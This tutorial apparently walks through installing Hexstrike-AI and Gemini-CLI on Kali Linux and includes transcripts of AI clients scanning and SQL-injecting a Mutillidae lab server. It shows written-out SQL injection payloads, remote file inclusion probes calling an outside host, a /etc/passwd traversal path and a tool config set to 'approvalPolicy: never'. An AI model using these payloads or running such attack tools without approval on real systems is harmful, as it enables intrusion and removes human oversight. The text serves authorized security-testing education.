Hexstrike-AI & Gemini-CLI AI-Powered Penetration Testing Tools

Author: Arnel C. Reyes
Published: 22 October 2025
Last Updated: 22 October 2025

Artificial intelligence is redefining offensive security, and Hexstrike-AI and Gemini-CLI are at the forefront of this transformation. Both tools leverage AI to enhance penetration testing workflows on Kali Linux, but they do so in distinct ways. Hexstrike-AI focuses on exploit generation and post-exploitation automation, streamlining complex attack chains through intelligent orchestration. Gemini-CLI, meanwhile, integrates large language model capabilities directly into the terminal, enabling AI-assisted reconnaissance, payload crafting, and adaptive attack strategies.

Together, these tools represent the next evolution of the red-team and penetration testing landscape—where human expertise is amplified by machine intelligence, and the boundaries of automation are continually expanding.

Background

The offensive side of cybersecurity is undergoing a shift. Traditionally, penetration testing relied heavily on manual enumeration, scripting and deep domain knowledge. With systems growing more complex and threat surfaces expanding, there’s an increasing need for automation that isn’t just “run this script” — but “intelligently adapt to what the system gives you.”

In this context:

Hexstrike-AI brings in neural- or model-based steps to autonomously pick exploit paths, deliver payloads and escalate privileges.
Gemini-CLI takes a different tack, using AI to assist in reconnaissance, make sense of system responses, refine attack vectors and craft more effective payloads.

Both tools represent a significant shift in how penetration testing is performed. Instead of static checklists or prebuilt scripts, AI is now bringing context-aware adaptability to the attacker’s toolkit. Kali Linux provides the ideal sandbox — flexible, open, and battle-tested — for experimenting with these next-generation offensive systems. Running on Kali Linux gives penetration testers and red-teamers a familiar environment to test these next-gen tools.

Preparing Kali Linux

Kali Linux is a powerful Debian-based penetration testing distribution packed with security tools. It can be ran on a Virtual Machine (VM) or in a Docker container.

Option A: Running Kali Linux on a Virtual Machine

Download the official Kali Linux image

Go to the official site: https://www.kali.org/get-kali/
- VMware Image (.ova)
- VirtualBox Image (.ova)
- ISO (for manual installation)
Import Kali into your virtualization software
- For VirtualBox:
  1. Open VirtualBox → File → Import Appliance
  2. Select the .ova file
  3. Click Import
- For VMWare:
  1. Open VMware Workstation or Fusion → File → Open
  2. Select the .ova file
  3. Click Import
Start Kali Linux

Default credentials (from official images):

Username: kali
Password: kali
After login, update everything:

$ sudo apt update && sudo apt full-upgrade -y
(Optional) Install full suite of tools

$ sudo apt install -y kali-linux-full

> Installs all tools.
> If preferred just the top tools:

$ sudo apt install -y kali-linux-top10

kali-linux-top10 is a metapackage that pulls in the 10 most important Kali tools. Installing it will install these packages:
- aircrack-ng — wireless LAN (WEP/WPA) cracking suite
- burpsuite — web application testing proxy / scanner (community or bundled edition)
- hydra — fast network login cracker (password brute force)
- john — John the Ripper, password-cracking suite
- metasploit-framework — exploitation framework (msfconsole, modules, etc.)
- netexec — small remote command execution helper (used in some pentest workflows)
- nmap — network scanner / port scanner / host discovery
- responder — LLMNR/NBT-NS/mDNS poisoning and credential capture tool
- sqlmap — automated SQL injection and database takeover tool
- wireshark — network protocol analyzer / packet capture GUI

Option B: Running Kali Linux on a Docker Container

Pull the official Kali Linux image

$ docker pull kalilinux/kali-rolling
Run an interactive Kali container

$ docker run -it --name mykali kalilinux/kali-rolling /bin/bash

Expose ports if needed (for Hexstrike-AI MCP Server)

Example: Expose Hexstrike-AI on port 8888

$ docker run -it -p 8888:8888 --name mykali kalilinux/kali-rolling /bin/bash
Update packages

$ apt update && apt full-upgrade -y
Install essential tools

For top tools:

$ apt install -y kali-linux-top10

Or full suite:

$ apt install -y kali-linux-full

Or everything

$ apt install -y kali-linux-everything

Warning: This will take time and disk space (20–40 GB).
Add networking tools

$ apt install -y net-tools iproute2 traceroute dnsutils ethtool wireless-tools arp-scan curl wget
Install pip3 if needed

$ apt install -y python3-pip
Save and reuse by keeping container persistent

To keep tools and data after exiting by committing a container to an image

$ docker commit mykali mykali-custom

Next time, just run:

$ docker run -it --name kali mykali-custom /bin/bash

If preferred a custom Kali image with preinstalled tools:

Create Dockerfile file:

```Dockerfile
FROM kalilinux/kali-rolling

RUN apt update && apt install -y \
nmap \
metasploit-framework \
sqlmap \
hydra \
nikto \
net-tools \
iputils-ping \
iproute2 \
traceroute \
dnsutils \
ethtool \
wireless-tools \
arp-scan
gemini-cli \
&& apt clean
```

Then build it:

$ docker build -t mykali .

Then run it:

$ docker run -it mykali

Next time, run using the following:

$ docker start -i mykali

Interact with running container:

$ docker exec -it mykali /bin/bash

Hexstrike-AI is purpose-built to automate offensive workflows end-to-end. It offers a multi-agent architecture, tying large language models (LLMs) like GPT or Claude into a decision-engine that orchestrates over 150 professional security tools (scanning, exploitation, payload delivery, binary & web apps) in a unified framework. Because of this high level of automation, the tool is already attracting attention — both from red teams and, unfortunately, threat actors. For example, it reportedly reduced the time-to-exploit for certain CVEs from days to under 10 minutes.

Setting-Up Hexstrike-AI on Kali

Clone the repository

$ git clone https://github.com/0x4m4/hexstrike-ai.git
$ cd hexstrike-ai
Setup virtual environment

Install virtual environment

$ apt -y install python3.13-venv

Create virtual environment:

$ python3 -m venv hexstrike-env
$ source hexstrike-env/bin/activate # Linux/Mac
# hexstrike-env\Scripts\activate # Windows
Install Python dependencies

$ apt install -y python3-pip
$ pip3 install -r requirements.txt

Start the backend Hexstrike-AI agent server

$ python3 hexstrike_server.py

# Optional: Start with debug mode
$ python3 hexstrike_server.py --debug

# Optional: Custom port configuration
$ python3 hexstrike_server.py --port 8888

If backend agent server is successfully setup, the server will start listening:

2025-10-22 13:38:55,417 - __main__ - INFO - 🔧 Process pool worker 0 started
2025-10-22 13:38:55,419 - __main__ - INFO - 🔧 Process pool worker 1 started
2025-10-22 13:38:55,420 - __main__ - INFO - 🔧 Process pool worker 2 started
2025-10-22 13:38:55,421 - __main__ - INFO - 🔧 Process pool worker 3 started

██╗ ██╗███████╗██╗ ██╗███████╗████████╗██████╗ ██╗██╗ ██╗███████╗
██║ ██║██╔════╝╚██╗██╔╝██╔════╝╚══██╔══╝██╔══██╗██║██║ ██╔╝██╔════╝
███████║█████╗ ╚███╔╝ ███████╗ ██║ ██████╔╝██║█████╔╝ █████╗
██╔══██║██╔══╝ ██╔██╗ ╚════██║ ██║ ██╔══██╗██║██╔═██╗ ██╔══╝
██║ ██║███████╗██╔╝ ██╗███████║ ██║ ██║ ██║██║██║ ██╗███████╗
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═╝╚══════╝

┌─────────────────────────────────────────────────────────────────────┐
│ 🚀 HexStrike AI - Blood-Red Offensive Intelligence Core │
│ ⚡ AI-Automated Recon | Exploitation | Analysis Pipeline │
│ 🎯 Bug Bounty | CTF | Red Team | Zero-Day Research │
└─────────────────────────────────────────────────────────────────────┘

[INFO] Server starting on 127.0.0.1:8888
[INFO] 150+ integrated modules | Adaptive AI decision engine active
[INFO] Blood-red theme engaged – unified offensive operations UI

2025-10-22 13:38:55,499 - __main__ - INFO - ╭───────────────────────────────────────────╮
2025-10-22 13:38:55,499 - __main__ - INFO - │ 🚀 Starting HexStrike AI Tools API Server │
2025-10-22 13:38:55,500 - __main__ - INFO - ├───────────────────────────────────────────┤
2025-10-22 13:38:55,500 - __main__ - INFO - │ 🌐 Port: 8888 │
2025-10-22 13:38:55,500 - __main__ - INFO - │ 🔧 Debug Mode: False │
2025-10-22 13:38:55,501 - __main__ - INFO - │ 💾 Cache Size: 1000 | TTL: 3600s │
2025-10-22 13:38:55,501 - __main__ - INFO - │ ⏱️ Command Timeout: 300s │
2025-10-22 13:38:55,501 - __main__ - INFO - │ ✨ Enhanced Visual Engine: Active │
2025-10-22 13:38:55,501 - __main__ - INFO - ╰───────────────────────────────────────────╯
* Serving Flask app 'hexstrike_server'
* Debug mode: off
2025-10-22 13:38:55,515 - werkzeug - INFO - WARNING: This is a development server. Do not
use it in a production deployment. Use a production WSGI server instead.
* Running on all addresses (0.0.0.0)
* Running on http://127.0.0.1:8888
* Running on http://172.17.0.2:8888
2025-10-22 13:38:55,515 - werkzeug - INFO - Press CTRL+C to quit

Verify Installation

# Test server health
$ curl http://localhost:8888/health

# Test AI agent capabilities
$ curl -X POST http://localhost:8888/api/intelligence/analyze-target \
-H "Content-Type: application/json" \
-d '{"target": "example.com", "analysis_type": "comprehensive"}'

Setting-Up Hexstrike-AI on AI Client

Option A: Claude

Download and Install Claude

Go to: https://claude.com/download

Once installed, login using Claude account

To configure:

Go to Settings → Developer → Local MCP Servers
Click Edit Config

Edit ~/claude/claude_desktop_config.json

{
"mcpServers": {
"hexstrike-ai": {
"command": "python",
"args": [
"/path-to/hexstrike-ai/hexstrike_mcp.py",
"--server",
"http://ip-address-of-hexstrike-ai-backend-server:8888"
]
}
}
}

Reset Claude
Once Claude is restarted, hexstrike-ai tool must be available on tools list
AI client is ready to receive prompt to interact with Hexstrike-AI to perform security tests

Option B: Cursor

Download and Install Cursor

Go to: https://cursor.com/download

Once installed, login using Cursor account

To configure:

Open Settings (Ctrl+Shift+J) → Tools & MCP → Tools
Click New MCP Server

Edit ~/.cursor/mcp.json

{
"mcpServers": {
"hexstrike-ai": {
"command": "python",
"args": [
"/path-to/hexstrike-ai/assets/hexstrike_mcp.py",
"--server",
"http://ip-address-of-hexstrike-ai-backend-server:8888"
],
"description": "HexStrike AI v6.0 - Advanced Cybersecurity Automation Platform",
"timeout": 700,
"disabled": false
}
}
}

AI client is ready to receive prompt to interact with Hexstrike-AI to perform security tests

Option C: 5ire

Download and Install 5ire

Go to: https://5ire.app/

Once installed, login using 5ire account

To configure:

Go to Tools → Tools
Click + Local

Enter the following:

Tool Key: hexstrike
Name: hexstrike
Approval Policy: Never
Command: python /path-to/hexstrike-ai/hexstrike_mcp.py --server http://ip-address-of-hexstrike-ai-backend-server:8888

Config Preview:

{
"name": "hexstrike",
"key": "hexstrike",
"description": "hexstrike",
"command": "python",
"args": [
"/path-to/hexstrike-ai/hexstrike_mcp.py",
"--server",
"http://ip-address-of-hexstrike-ai-backend-server:8888"
],
"approvalPolicy": "never"
}

Click Save
AI client is ready to receive prompt to interact with Hexstrike-AI to perform security tests

More details about Hexstrike-AI: https://github.com/0x4m4/hexstrike-ai

AI Client Used: Cursor

Vulnerable Test Server: Mutillidae

Prompts Used:

are you connected to hexstrike-ai mcp server?
run nmap to discover live hosts in 192.168.0.0 network that are listening on port 80 or 443
run nikto for 192.168.0.152
run sqlmap for the login page to detect sql injection and try to discover databases and users on the sql server.

User

are you connected to hexstrike-ai mcp server?

------------------------------------------------------------------------

Cursor

Yes, I am connected to the HexStrike-AI MCP server! I can see all the
available tools and functions from the HexStrike-AI server in my
available tools list. This includes a comprehensive suite of
cybersecurity and penetration testing tools such as:

Network Scanning & Reconnaissance: - Nmap scanning (basic and
advanced) - Rustscan for fast port scanning - Masscan for high-speed
scanning - AutoRecon for comprehensive reconnaissance - ARP scanning and
network discovery

Web Application Security: - Gobuster, Dirb, FFuf for directory
enumeration - Nikto, Nuclei for vulnerability scanning - SQLMap, XSSer,
Dalfox for specific attack vectors - Burp Suite and OWASP ZAP
integration - API fuzzing and GraphQL scanning

Cloud Security: - Prowler for AWS security assessment - Scout Suite for
multi-cloud analysis - CloudMapper for AWS network visualization - Pacu
for AWS exploitation

Container & Kubernetes Security: - Trivy for vulnerability scanning -
Kube-hunter for Kubernetes penetration testing - Kube-bench for CIS
benchmarks - Docker Bench for Security

Binary Analysis & Reverse Engineering: - GDB, Radare2, Ghidra analysis -
Pwntools for exploit development - ROPgadget, Ropper for ROP chain
building - Volatility for memory forensics

Password Attacks & Cracking: - Hydra, Hashcat, John the Ripper - Custom
payload generation

And many more specialized tools for various aspects of cybersecurity
testing and analysis.

Would you like me to help you with any specific security testing tasks
or demonstrations of these capabilities?

------------------------------------------------------------------------

User

run nmap to discover live hosts in 192.168.0.0 network that are
listening on port 80 or 443

------------------------------------------------------------------------

Cursor

I’ll run an Nmap scan to discover live hosts in the 192.168.0.0 network
that are listening on ports 80 or 443.

Great! The Nmap scan has completed successfully. Here are the results:

Live Hosts with Ports 80/443 Open

2 hosts found with both HTTP (port 80) and HTTPS (port 443) services
running:

1. 192.168.0.1
- Port 80: HTTP (open)
- Port 443: HTTPS (open)
- MAC Address: A4:56:CC:1A:30:9A (Technicolor CH USA)
- Response time: 0.039s
2. 192.168.0.152
- Port 80: HTTP (open)
- Port 443: HTTPS (open)
- MAC Address: D4:6A:6A:A1:4C:21 (Hon Hai Precision Ind.)
- Response time: 0.001s (very fast response)

Scan Summary

- Total hosts scanned: 256 IP addresses (192.168.0.0/24 network)
- Live hosts discovered: 9 hosts total
- Hosts with web services: 2 hosts
- Scan duration: 10.12 seconds

The scan used a SYN scan (-sS) which is stealthy and efficient for
discovering open ports. Both discovered hosts appear to be running web
servers, with 192.168.0.1 likely being a router/gateway device
(Technicolor) and 192.168.0.152 potentially being a computer or network
device (Hon Hai Precision).

Would you like me to perform additional reconnaissance on these hosts,
such as service version detection or web application scanning?

------------------------------------------------------------------------

User

run nikto for 192.168.0.152

------------------------------------------------------------------------

Cursor

I’ll run Nikto to perform a web vulnerability scan on 192.168.0.152.

The Nikto scan has completed successfully and revealed numerous security
vulnerabilities on 192.168.0.152. Here’s a comprehensive analysis of the
findings:

🚨 Critical Security Issues Found

Server Information

- Web Server: Apache/2.4.65 (Debian)
- PHP Version: 8.4.13
- Scan Duration: 53 seconds
- Total Issues: 145 vulnerabilities detected

🔴 HIGH SEVERITY VULNERABILITIES

1. Remote File Inclusion (RFI) Vulnerabilities
- Multiple RFI vulnerabilities detected across various parameters
- Examples include parameters like page, config, abs_path,
includeDir, etc.
- Impact: Allows attackers to include and execute remote files
2. Local File Inclusion (LFI)
- /index.php?page=../../../../../../../../../../etc/passwd -
Directory traversal vulnerability
- Impact: Can potentially read system files like /etc/passwd
3. Information Disclosure
- /phpinfo.php - PHP configuration exposed
- Impact: Reveals system information, paths, and configuration
details

🟡 MEDIUM SEVERITY ISSUES

4. Directory Indexing
- Multiple directories allow listing: /data/, /includes/,
/passwords/, /images/, /styles/, /webservices/
- Impact: Information disclosure of directory contents
5. Security Headers Missing
- Missing X-Frame-Options header (clickjacking protection)
- Missing X-Content-Type-Options header
- Impact: Increased risk of clickjacking and MIME type confusion
6. Cookie Security Issues
- Cookies PHPSESSID and showhints lack HttpOnly flag
- Impact: Potential XSS attacks via cookie access

🟢 LOW SEVERITY ISSUES

7. Administrative Interface
- /login.php - Admin login page detected
- /robots.txt - Contains 7 entries that should be reviewed
8. Uncommon Headers
- logged-in-user header found (may indicate custom authentication)

📊 Risk Assessment Summary

Vulnerability Type Count Risk Level
------------------------ ------- ------------
Remote File Inclusion 100+ CRITICAL
Local File Inclusion 1 HIGH
Information Disclosure 3 MEDIUM
Directory Indexing 6 MEDIUM
Security Headers 2 MEDIUM
Cookie Issues 2 LOW

🛡️ Immediate Recommendations

1. URGENT: Fix all Remote File Inclusion vulnerabilities
2. URGENT: Remove or secure /phpinfo.php
3. HIGH: Implement proper input validation and sanitization
4. HIGH: Add security headers (X-Frame-Options, X-Content-Type-Options)
5. MEDIUM: Disable directory indexing
6. MEDIUM: Set HttpOnly flag on cookies
7. LOW: Review /robots.txt entries

This web application appears to be severely vulnerable and should not be
exposed to the internet without immediate remediation of the critical
RFI and LFI vulnerabilities.

------------------------------------------------------------------------

User

run sqlmap for the login page to detect sql injection and try to discover
databases and users on the sql server.

------------------------------------------------------------------------

Cursor

I’ll run SQLMap to test for SQL injection vulnerabilities on the target
URL and attempt to discover databases and users. I’ll use the parameters
you specified with some additional options for comprehensive testing.

Excellent! SQLMap has successfully identified SQL injection
vulnerabilities and discovered critical information about the target
database. Here’s a comprehensive analysis of the findings:

🚨 SQL INJECTION VULNERABILITIES CONFIRMED

Target Information

- URL: http://192.168.0.152/index.php?page=login.php
- Vulnerable Parameter: username (POST parameter)
- Database System: MySQL >= 5.0 (MariaDB fork)
- Web Server: Apache 2.4.65 on Linux Debian
- PHP Version: 8.4.13

🔴 CRITICAL: Multiple SQL Injection Types Detected

SQLMap identified 3 different types of SQL injection vulnerabilities:

1. Boolean-based Blind SQL Injection
- Payload:
username=-3623' OR 1091=1091#&password=test&login-php-submit-button=Login
- Type: OR boolean-based blind - WHERE or HAVING clause (MySQL
comment)
2. Error-based SQL Injection
- Payload:
username=test' OR (SELECT 9395 FROM(SELECT COUNT(*),CONCAT(0x716b626271,(SELECT (ELT(9395=9395,1))),0x716b627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OYNW&password=test&login-php-submit-button=Login
- Type: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
3. Time-based Blind SQL Injection
- Payload:
username=test' AND (SELECT 1611 FROM (SELECT(SLEEP(5)))sCUm)-- ReTq&password=test&login-php-submit-button=Login
- Type: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

👥 Database Users Discovered (6 users)

Username Host Purpose
------------- ----------- ------------------------------
healthcheck 127.0.0.1 Health monitoring
healthcheck ::1 Health monitoring (IPv6)
healthcheck localhost Health monitoring
mariadb.sys localhost System user
root % ⚠️ ROOT ACCESS FROM ANY HOST
root localhost Root user

🗄️ Databases Discovered (5 databases)

Database Name Purpose
-------------------- -----------------------------------------------
information_schema MySQL system schema
mutillidae ⚠️ Likely vulnerable web application database
mysql MySQL system database
performance_schema MySQL performance monitoring
sys MySQL system database

🚨 CRITICAL SECURITY FINDINGS

1. Root Access from Any Host
- User root@% has administrative privileges from ANY host
- This is extremely dangerous and should be immediately restricted
2. Mutillidae Database
- This appears to be a vulnerable web application database
(Mutillidae is a deliberately vulnerable web app)
- Likely contains application data and potentially sensitive
information
3. Multiple Injection Vectors
- The application is vulnerable to 3 different types of SQL
injection
- This provides attackers with multiple attack vectors

📊 Risk Assessment

Risk Level Count Details
------------ ------- ---------------------------------
CRITICAL 3 Multiple SQL injection types
HIGH 1 Root access from any host
MEDIUM 1 Mutillidae application database

🛡️ Immediate Remediation Steps

1. URGENT: Fix SQL injection vulnerabilities in login form
2. URGENT: Restrict root user access to localhost only
3. HIGH: Implement proper input validation and parameterized queries
4. HIGH: Review and secure the mutillidae database
5. MEDIUM: Audit all database user permissions
6. MEDIUM: Implement database access logging

📁 Data Location

All extracted data has been saved to:
/root/.local/share/sqlmap/output/192.168.0.152

This target is severely compromised with multiple critical SQL injection
vulnerabilities that provide full database access. Immediate remediation
is required to prevent further exploitation.

Note: The test was performed in a private, isolated lab environment as a proof-of-concept to evaluate Hexstrike-AI's effectiveness in penetration-testing workflows. All tests were authorized, reproducible, contained, and confined to isolated systems; no production or third-party systems were involved.

Gemini-CLI is listed in the Kali tools repository as an open-source AI agent (or interface) package:

“This package contains an open-source AI agent that brings the power of Gemini directly into your terminal.”

It’s not necessarily a full offensive-security framework in its own right but rather a command-line interface to the Gemini model embedded into Kali. You can invoke it with commands like gemini-cli -p/--prompt to issue prompts directly or launch interactive shells.

Its value in the offensive-security context comes from enabling an LLM inside your Kali terminal environment — which pentesters can use for reasoning, payload crafting, reconnaissance brainstorming, or translating natural language prompts into technical commands.

Setting-Up Gemini-CLI on Kali

Install gemini-cli

This package contains an open-source AI agent that brings the power of Gemini directly into the terminal. It provides lightweight access to Gemini, giving the most direct path from your prompt to the model.

$ apt install -y gemini-cli

Check gemini-cli usage

$ gemini-cli -h
Usage: gemini [options] [command]

Gemini CLI - Launch an interactive CLI, use -p/--prompt for non-interactive mode

Commands:
gemini Launch Gemini CLI [default]
gemini mcp Manage MCP servers

Options:
-m, --model Model [string]
-p, --prompt Prompt. Appended to input on stdin (if any). [string]
-i, --prompt-interactive Execute the provided prompt and continue in interactive mode [string]
-s, --sandbox Run in sandbox? [boolean]
--sandbox-image Sandbox image URI. [string]
-d, --debug Run in debug mode? [boolean] [default: false]
-a, --all-files Include ALL files in context? [boolean] [default: false]
--all_files Include ALL files in context? [deprecated: Use --all-files instead. We will be removing --all_files in the coming weeks.] [boolean] [default: false]
--show-memory-usage Show memory usage in status bar [boolean] [default: false]
--show_memory_usage Show memory usage in status bar [deprecated: Use --show-memory-usage instead. We will be removing --show_memory_usage in the coming weeks.] [boolean] [default: false]
-y, --yolo Automatically accept all actions (aka YOLO mode, see https://www.youtube.com/watch?v=xvFZjo5PgG0 for more details)? [boolean] [default: false]
--approval-mode Set the approval mode: default (prompt for approval), auto_edit (auto-approve edit tools), yolo (auto-approve all tools) [string] [choices: "default", "auto_edit", "yolo"]
--telemetry Enable telemetry? This flag specifically controls if telemetry is sent. Other --telemetry-* flags set specific values but do not enable telemetry on their own. [boolean]
--telemetry-target Set the telemetry target (local or gcp). Overrides settings files. [string] [choices: "local", "gcp"]
--telemetry-otlp-endpoint Set the OTLP endpoint for telemetry. Overrides environment variables and settings files. [string]
--telemetry-log-prompts Enable or disable logging of user prompts for telemetry. Overrides settings files. [boolean]
--telemetry-outfile Redirect all telemetry output to the specified file. [string]
-c, --checkpointing Enables checkpointing of file edits [boolean] [default: false]
--experimental-acp Starts the agent in ACP mode [boolean]
--allowed-mcp-server-names Allowed MCP server names [array]
-e, --extensions A list of extensions to use. If not provided, all extensions are used. [array]
-l, --list-extensions List all available extensions and exit. [boolean]
--proxy Proxy for gemini client, like schema://user:password@host:port [string]
--include-directories Additional directories to include in the workspace (comma-separated or multiple --include-directories) [array]
-v, --version Show version number [boolean]
-h, --help Show help [boolean]

Run gemini-cli

$ gemini-cli

Once gemini-cli is running, it will provide options to login.

███ █████████ ██████████ ██████ ██████ █████ ██████ █████ █████
░░░███ ███░░░░░███░░███░░░░░█░░██████ ██████ ░░███ ░░██████ ░░███ ░░███
░░░███ ███ ░░░ ░███ █ ░ ░███░█████░███ ░███ ░███░███ ░███ ░███
░░░███ ░███ ░██████ ░███░░███ ░███ ░███ ░███░░███░███ ░███
███░ ░███ █████ ░███░░█ ░███ ░░░ ░███ ░███ ░███ ░░██████ ░███
███░ ░░███ ░░███ ░███ ░ █ ░███ ░███ ░███ ░███ ░░█████ ░███
███░ ░░█████████ ██████████ █████ █████ █████ █████ ░░█████ █████
░░░ ░░░░░░░░░ ░░░░░░░░░░ ░░░░░ ░░░░░ ░░░░░ ░░░░░ ░░░░░ ░░░░░

Tips for getting started:
1. Ask questions, edit files, or run commands.
2. Be specific for the best results.
3. Create GEMINI.md files to customize your interactions with Gemini.
4. /help for more information.
╭───────────────────────────────────────────────────────────────────────────────╮
│ │
│ Get started │
│ │
│ How would you like to authenticate for this project? │
│ │
│ ● 1. Login with Google │
│ 2. Use Gemini API Key │
│ 3. Vertex AI │
│ │
│ No authentication method selected. │
│ │
│ (Use Enter to select) │
│ │
│ Terms of Services and Privacy Notice for Gemini CLI │
│ │
│ https://github.com/google-gemini/gemini-cli/blob/main/docs/tos-privacy.md │
│ │
╰───────────────────────────────────────────────────────────────────────────────╯

----------------------------------------------------------------
Logging in with Google... Please restart Gemini CLI to continue.
----------------------------------------------------------------

If Login with Google is selected, restart gemili-cli then the following will provided to get authenticated using Google credentials:

The CLI will open a browser window (or provide a URL) to authenticate with Gmail.
Sign in with Gmail account (new or the same one).
Once done, Gemini stores a new token locally.
Note: Logout or clear the existing Gmail session

$ rm -rf ~/.config/gemini
$ rm -rf ~/.gemini

After successfully authenticated prompt will be available.

Loaded cached credentials.

███ █████████ ██████████ ██████ ██████ █████ ██████ █████ █████
░░░███ ███░░░░░███░░███░░░░░█░░██████ ██████ ░░███ ░░██████ ░░███ ░░███
░░░███ ███ ░░░ ░███ █ ░ ░███░█████░███ ░███ ░███░███ ░███ ░███
░░░███ ░███ ░██████ ░███░░███ ░███ ░███ ░███░░███░███ ░███
███░ ░███ █████ ░███░░█ ░███ ░░░ ░███ ░███ ░███ ░░██████ ░███
███░ ░░███ ░░███ ░███ ░ █ ░███ ░███ ░███ ░███ ░░█████ ░███
███░ ░░█████████ ██████████ █████ █████ █████ █████ ░░█████ █████
░░░ ░░░░░░░░░ ░░░░░░░░░░ ░░░░░ ░░░░░ ░░░░░ ░░░░░ ░░░░░ ░░░░░

Tips for getting started:
1. Ask questions, edit files, or run commands.
2. Be specific for the best results.
3. Create GEMINI.md files to customize your interactions with Gemini.
4. /help for more information.

╭───────────────────────────────────────────────────────────────────────────────╮
│ > Type your message or @path/to/file │
╰───────────────────────────────────────────────────────────────────────────────╯
/usr/lib/gemini-cli no sandbox (see /docs) gemini-2.5-pro (100% context left)

AI client is ready to receive prompt to interact with gemini-cli to perform security tests

More details about Gemini-CLI: https://www.kali.org/tools/gemini-cli/

AI Client Used: Gemini-CLI

Vulnerable Test Server: Mutillidae

Prompts Used:

run nmap to discover live hosts in 192.168.0.0 network that are listening on port 80 or 443
run nikto for 192.168.0.152
run sqlmap for the login page to detect sql injection and try to discover databases and users on the sql server.

╭──────────────────────────────────────────────────────────────────────────────────╮
│ > run nmap to discover live hosts in 192.168.0.0 network that are listening on │
│ port 80 or 443 │
╰──────────────────────────────────────────────────────────────────────────────────╯

✦ I will scan the 192.168.0.0/24 network for hosts with open TCP ports 80 or 443.
╭──────────────────────────────────────────────────────────────────────────────────╮
│ ✔ Shell nmap -T4 --open -p 80,443 192.168.0.0/24 (Scan the 192.168.0.0/24)netw… │
│ │
│ Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-21 13:31 │
│ EDT │
│ Nmap scan report for 192.168.0.1 │
│ Host is up (0.0087s latency). │
│ │
│ PORT STATE SERVICE │
│ 80/tcp open http │
│ 443/tcp open https │
│ MAC Address: A4:56:CC:1A:30:9A (Technicolor CH USA) │
│ │
│ Nmap scan report for 192.168.0.152 │
│ Host is up (0.00060s latency). │
│ │
│ PORT STATE SERVICE │
│ 80/tcp open http │
│ 443/tcp open https │
│ MAC Address: D4:6A:6A:A1:4C:21 (Hon Hai Precision Ind.) │
│ │
│ Nmap done: 256 IP addresses (10 hosts up) scanned in 7.43 seconds │
╰──────────────────────────────────────────────────────────────────────────────────╯
✦ The scan found two hosts with ports 80 and 443 open: 192.168.0.1 and
192.168.0.152.

╭─────────────────────────────────╮
│ > run nikto for 192.168.0.152 │
╰─────────────────────────────────╯

✦ I will run a Nikto scan on 192.168.0.152 to check for web server
vulnerabilities.
╭──────────────────────────────────────────────────────────────────────────────────╮
│ ✔ Shell nikto -h 192.168.0.152 (Run a Nikto scan on 192.168.0.152 to check for… │
│ │
│ ... first 306 lines hidden ... │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?mode=http://blog.cirt.net/rfiinc.txt?&cmd=: Remote │
│ File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?modpath=http://blog.cirt.net/rfiinc.txt: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + │
│ /index.php?module=PostWrap&page=http://blog.cirt.net/rfiinc.txt: │
│ Remote File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + │
│ /index.php?mosConfig_absolute_path=http://blog.cirt.net/rfiinc.tx │
│ t: Remote File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + │
│ /index.php?news7[\"functions\"]=http://blog.cirt.net/rfiinc.txt: │
│ Remote File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?news_include_path=http://blog.cirt.net/rfiinc.txt: │
│ Remote File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?open=http://blog.cirt.net/rfiinc.txt: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + │
│ /index.php?option=com_custompages&cpage=http://blog.cirt.net/rfii │
│ nc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?page=http://blog.cirt.net/rfiinc.txt: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?page=http://blog.cirt.net/rfiinc.txt?: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?pagehttp://blog.cirt.net/rfiinc.txt: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?pageNikto=http://blog.cirt.net/rfiinc.txt: Remote │
│ File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?pagename=http://blog.cirt.net/rfiinc.txt: Remote │
│ File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?pager=http://blog.cirt.net/rfiinc.txt: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?pagina=http://blog.cirt.net/rfiinc.txt?: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + │
│ /index.php?path_to_folder=http://blog.cirt.net/rfiinc.txt?cmd=id: │
│ Remote File Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?pg=http://blog.cirt.net/rfiinc.txt: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
│ + /index.php?pg=http://blog.cirt.net/rfiinc.txt?: Remote File │
│ Inclusion (RFI) from RSnake's RFI list. See: │
│ https://gist.github.com/mubix/5d269c686584875015a2 │
